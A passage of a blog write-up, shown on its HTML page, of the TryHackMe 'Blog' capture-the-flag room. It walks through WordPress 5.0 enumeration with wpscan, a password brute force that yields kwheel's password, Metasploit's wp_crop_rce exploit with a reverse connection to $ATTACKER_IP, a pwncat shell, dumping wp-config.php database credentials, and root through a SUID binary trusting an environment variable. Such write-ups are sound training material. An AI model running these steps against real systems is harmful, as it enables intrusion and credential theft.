      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wpscan <span class="nt">--url</span> http://<span class="nv">$TARGET_IP</span>

<span class="o">[</span>+] robots.txt found: http://10.10.132.87/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt <span class="o">(</span>Aggressive Detection<span class="o">)</span>
 | Confidence: 100%

<span class="o">[</span>+] Upload directory has listing enabled: http://10.10.132.87/wp-content/uploads/
 | Found By: Direct Access <span class="o">(</span>Aggressive Detection<span class="o">)</span>
 | Confidence: 100%

<span class="o">[</span>+] WordPress version 5.0 identified <span class="o">(</span>Insecure, released on 2018-12-06<span class="o">)</span><span class="nb">.</span>
 | Found By: Emoji Settings <span class="o">(</span>Passive Detection<span class="o">)</span>
 |  - http://10.10.132.87/, Match: <span class="s1">'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'</span>
 | Confirmed By: Meta Generator <span class="o">(</span>Passive Detection<span class="o">)</span>
 |  - http://10.10.132.87/, Match: <span class="s1">'WordPress 5.0'</span>

<span class="o">[</span>i] No plugins Found.
</pre></td></tr></tbody></table></code></div></div>

<p>I checked the <code class="language-plaintext highlighter-rouge">/wp-content/uploads/</code> folder since it has directory listing enabled, but found nothing interesting there. Version is 5.0 which is quite old, so let’s search for potential exploits.</p>

<h2 id="searchsploit"><span class="me-2">Searchsploit</span><a href="#searchsploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Wordpress 5.0 is an <strong>old</strong> version <em>(the latest version is 6.7)</em>, so running <a href="https://www.kali.org/tools/exploitdb/">searchsploit</a> against this version might be a good idea</p>

<p><a href="/assets/img/writeups/thm/blog/searchsploit.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/searchsploit.png" alt="metasploit"  loading="lazy"></a>
<em>Searchsploit found a lot of exploits that match this WP version</em></p>

<p>There are a ton of exploits, but only 5 of them affect WordPress itself and only 4 are of interest <em>(the fifth is a DoS exploit)</em>.</p>

<p>The others exploits target WP plugins, but we know from <a href="#wpscan">the wpscan</a> that there are no plugins installed here. So we only need to test 4 exploits.</p>

<p><a href="/assets/img/writeups/thm/blog/searchsploit_cleaned.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/searchsploit_cleaned.png" alt="metasploit"  loading="lazy"></a>
<em>The relevant exploits</em></p>

<p>We have gathered enough information from the enumeration phase. Let’s move on to the exploitation part.</p>

<h1 id="exploitation">Exploitation</h1>

<h2 id="testing-searchsploit-exploits"><span class="me-2">Testing searchsploit exploits</span><a href="#testing-searchsploit-exploits" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th style="text-align: left">Exploit name</th>
      <th style="text-align: left">Problem</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left"><code class="language-plaintext highlighter-rouge">php/webapps/49512.py</code></td>
      <td style="text-align: left">Authenticated</td>
    </tr>
    <tr>
      <td style="text-align: left"><code class="language-plaintext highlighter-rouge">php/webapps/46511.js</code></td>
      <td style="text-align: left">Authenticated</td>
    </tr>
    <tr>
      <td style="text-align: left"><code class="language-plaintext highlighter-rouge">php/remote/46662.rb</code></td>
      <td style="text-align: left">Authenticated</td>
    </tr>
    <tr>
      <td style="text-align: left"><code class="language-plaintext highlighter-rouge">multiple/webapps/47690.md</code></td>
      <td style="text-align: left">Didn’t work</td>
    </tr>
  </tbody>
</table></div>

<h2 id="bruteforcing-wordpress"><span class="me-2">Bruteforcing WordPress</span><a href="#bruteforcing-wordpress" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Since all exploits are authenticated and we don’t have credentials, let’s try a dictionary attack with <code class="language-plaintext highlighter-rouge">wpscan</code>. First we will create the user wordlist, then launch the attack:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>
┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"bjoel</span><span class="se">\n</span><span class="s2">kwheel"</span> <span class="o">&gt;</span> real_users.txt

┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wpscan <span class="nt">--url</span> http://<span class="nv">$TARGET_IP</span>/ <span class="nt">-U</span> real_users.txt <span class="nt">-P</span> <span class="nv">$PASSWORD_WORDLIST</span>
</pre></td></tr></tbody></table></code></div></div>

<p>I started by trying the <code class="language-plaintext highlighter-rouge">2020-200_most_used_passwords.txt</code> and the <code class="language-plaintext highlighter-rouge">2023-200_most_used_passwords.txt</code> wordlists from <a href="https://github.com/danielmiessler/SecLists">SecLists</a> but nothing came up. So I decied to be patient, and used the <code class="language-plaintext highlighter-rouge">rockyou.txt</code> wordlist. After a few minutes I got this:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">[</span>+] Performing password attack on Xmlrpc against 2 user/s
<span class="o">[</span>SUCCESS] - kwheel / cutiepie1
^C
<span class="o">[!]</span> Valid Combinations Found:
 | Username: kwheel, Password: cutiepie1 
</pre></td></tr></tbody></table></code></div></div>

<h2 id="getting-rce"><span class="me-2">Getting RCE</span><a href="#getting-rce" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>We finally have our needed credentials: <code class="language-plaintext highlighter-rouge">kwheel:cutiepie1</code>. Let’s use the <a href="https://www.kali.org/tools/metasploit-framework/">metasploit</a> authenticated exploit that we found earlier.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>msfconsole
msf6 <span class="o">&gt;</span> use exploit/multi/http/wp_crop_rce
</pre></td></tr></tbody></table></code></div></div>
<p>After typing <code class="language-plaintext highlighter-rouge">show options</code>, we notice that some parameters need to be configured.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>msf6 exploit(exploit/multi/http/wp_crop_rce) &gt; set USERNAME kwheel
msf6 exploit(exploit/multi/http/wp_crop_rce) &gt; set PASSWORD cutiepie1
msf6 exploit(exploit/multi/http/wp_crop_rce) &gt; set RHOSTS $TARGET_IP
msf6 exploit(exploit/multi/http/wp_crop_rce) &gt; set LHOST $ATTACKER_IP
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/blog/metasploit_exploit_ok.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/metasploit_exploit_ok.png" alt="metasploit"  loading="lazy"></a>
<em>Within a few seconds, we’re greeted with a meterpreter session.</em></p>

<h1 id="privesc">Privesc</h1>

<h2 id="pwncat"><span class="me-2">Pwncat</span><a href="#pwncat" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>The meterpreter is cool but I prefer to use <a href="https://www.kali.org/tools/pwncat/">pwncat</a>. So I setup the pwncat reverse listener in another terminal, and run a reverse shell from the meterpreter session like this:</p>

<p><a href="/assets/img/writeups/thm/blog/pwncat.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/pwncat.png" alt="metasploit"  loading="lazy"></a>
<em>From meterpreter to pwncat</em></p>

<h2 id="user-flag--or-not"><span class="me-2">User flag … or not</span><a href="#user-flag--or-not" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>I tried to <code class="language-plaintext highlighter-rouge">cat</code> the user flag, but I got trolled:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>(remote) www-data@blog:/var/www/wordpress$ cat /home/bjoel/user.txt
You won't find what you're lookif for here.

TRY HARDER
</pre></td></tr></tbody></table></code></div></div>

<p>Looking into the bjoel home directory, I came across a PDF. Downloaded it using <code class="language-plaintext highlighter-rouge">pwncat</code> and opened it:
<a href="/assets/img/writeups/thm/blog/pdf_joel.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/pdf_joel.png" alt="metasploit"  loading="lazy"></a>
<em>Joel was working for Rubber Ducky</em></p>

<p>This might be a clue, perhaps the flag is in <code class="language-plaintext highlighter-rouge">/media/</code> or something:</p>

<p><a href="/assets/img/writeups/thm/blog/user_txt_try.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/user_txt_try.png" alt="metasploit"  loading="lazy"></a></p>

<p>Not a big deal, we’ll search for the user flag once we have root access.</p>

<h2 id="manual-enumeration-1"><span class="me-2">Manual enumeration</span><a href="#manual-enumeration-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Let’s start by enumerating the users that have a connection shell</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@blog:/var/www/wordpress<span class="nv">$ </span><span class="nb">cat</span> /etc/passwd | <span class="nb">grep </span>bash
root:x:0:0:root:/root:/bin/bash
bjoel:x:1000:1000:Billy Joel:/home/bjoel:/bin/bash
</pre></td></tr></tbody></table></code></div></div>

<p>Next, let’s grab the content of the <code class="language-plaintext highlighter-rouge">wp-config.php</code> file. This file contains information required by WordPress to connect to the database such as:</p>
<ul>
  <li>db name</li>
  <li>db host</li>
  <li>db username</li>
  <li>db password</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@blog:/var/www/wordpress<span class="nv">$ </span><span class="nb">cat </span>wp-config.php | <span class="nb">grep </span>DB_
define<span class="o">(</span><span class="s1">'DB_NAME'</span>, <span class="s1">'blog'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_USER'</span>, <span class="s1">'wordpressuser'</span><span class="o">)</span><span class="p">;</span>
define<span class="o">(</span><span class="s1">'DB_PASSWORD'</span>, <span class="s1">'LittleYellowLamp90!@'</span><span class="o">)</span><span class="p">;</span>

</pre></td></tr></tbody></table></code></div></div>
<p>Tried using the database password to <code class="language-plaintext highlighter-rouge">su bjoel</code> and <code class="language-plaintext highlighter-rouge">su root</code>, but unfortunately it didn’t work. 
Next, I extracted the password for the bjoel WordPress user from the MySQL database and I attempted to crack it with <a href="https://www.kali.org/tools/john/">john</a>, but … my CPU ain’t powerful enough. 
Time for automated enumeration I guess.</p>

<h2 id="linpeas"><span class="me-2">Linpeas</span><a href="#linpeas" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p><em>Note: with pwncat, you can switch between the attacker’s shell and the victim’s shell by pressing <code class="language-plaintext highlighter-rouge">Ctrl + D</code></em>.</p>

<p><a href="/assets/img/writeups/thm/blog/linpeas.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/linpeas.png" alt="metasploit"  loading="lazy"></a>
<a href="/assets/img/writeups/thm/blog/suid.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/suid.png" alt="metasploit"  loading="lazy"></a>
<em>Look at the last line</em></p>

<p>It looks like there is an unknown SUID binary ! SUID (Set User ID) is a special permission with one key function: the binary <strong>executes as the user who owns the file</strong>. This means that if the binary is owned by root, it will execute with root privileges, even if launched by the <code class="language-plaintext highlighter-rouge">www-data</code> user. Therefore, it’s a significant privesc vector. More on that <a href="https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/">here</a>.</p>

<h2 id="suid-binary"><span class="me-2">SUID binary</span><a href="#suid-binary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>When we run the binary, it says <em>“Not an Admin”</em>. Let’s download it locally and try to <a href="https://www.systutorials.com/docs/linux/man/1-ltrace/">ltrace</a> it to examine dynamic libraries and syscall done by the binary:</p>

<p><a href="/assets/img/writeups/thm/blog/downloading_checker.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/downloading_checker.png" alt="metasploit"  loading="lazy"></a>
<em>Downloading it with the help of pwncat</em></p>

<p><a href="/assets/img/writeups/thm/blog/ltrace.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/ltrace.png" alt="metasploit"  loading="lazy"></a>
<em>Analyzing it with ltrace</em></p>

<p>From the <code class="language-plaintext highlighter-rouge">ltrace</code> output, we see that the binary checks the <code class="language-plaintext highlighter-rouge">admin</code> variable from the environment with the <code class="language-plaintext highlighter-rouge">getenv()</code> function. So we can just modify the admin env variable and set it to true. Once we do that we can grab our flags !</p>

<p><a href="/assets/img/writeups/thm/blog/double_flag.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/double_flag.png" alt="metasploit"  loading="lazy"></a>
<em>Rooted !</em></p>

<p>We use the find command to search for the real user.txt flag, which was indeed located in the <code class="language-plaintext highlighter-rouge">/media/usb/</code>, just as we suspected .</p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/tryhackme/">TryHackMe</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
          <a
            href="/tags/web/"
            class="post-tag no-text-decoration"
          >web</a>
        
          <a
            href="/tags/wordpress/"
            class="post-tag no-text-decoration"
          >wordpress</a>
        
          <a
            href="/tags/smb/"
            class="post-tag no-text-decoration"
          >smb</a>
        
          <a
            href="/tags/wpscan/"
            class="post-tag no-text-decoration"
          >wpscan</a>
        
          <a
            href="/tags/metasploit/"
            class="post-tag no-text-decoration"
          >metasploit</a>
        
          <a
            href="/tags/pwncat/"
            class="post-tag no-text-decoration"
          >pwncat</a>
        
          <a
            href="/tags/linux-privesc/"
            class="post-tag no-text-decoration"
          >linux-privesc</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Blog%20-%20NullBrunk&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-blog%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Blog%20-%20NullBrunk&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-blog%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fthm-blog%2F&text=Blog%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/UofTCTF2025-prismatic/">UofTCTF - Prismatic Blogs</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/SrdnlenCTF2025-racecondition/">Srdnlen CTF - Speed</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/thm-attacktivedirectory/">Attacktive Directory</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/thm-opacity/">Opacity</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/cve-2011-2523/">CVE-2011-2523 POC</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/linux-privesc/">linux-privesc</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/express/">express</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/pwncat/">pwncat</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/python/">python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asreproast/">asreproast</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/thm-opacity/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735833600"
  data-df="ll"
  
>
  Jan  2, 2025
</time>

              <h4 class="pt-0 my-2">Opacity</h4>
              <div class="text-muted">
                <p>Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-whiterose/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735747200"
  data-df="ll"
  
>
  Jan  1, 2025
</time>

              <h4 class="pt-0 my-2">Whiterose</h4>
              <div class="text-muted">
                <p>Yet another Mr. Robot themed challenge.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-attacktivedirectory/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735488000"
  data-df="ll"
  
>
  Dec 29, 2024
</time>

              <h4 class="pt-0 my-2">Attacktive Directory</h4>
              <div class="text-muted">
                <p>99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/NullBrunk">Anas</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.3"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
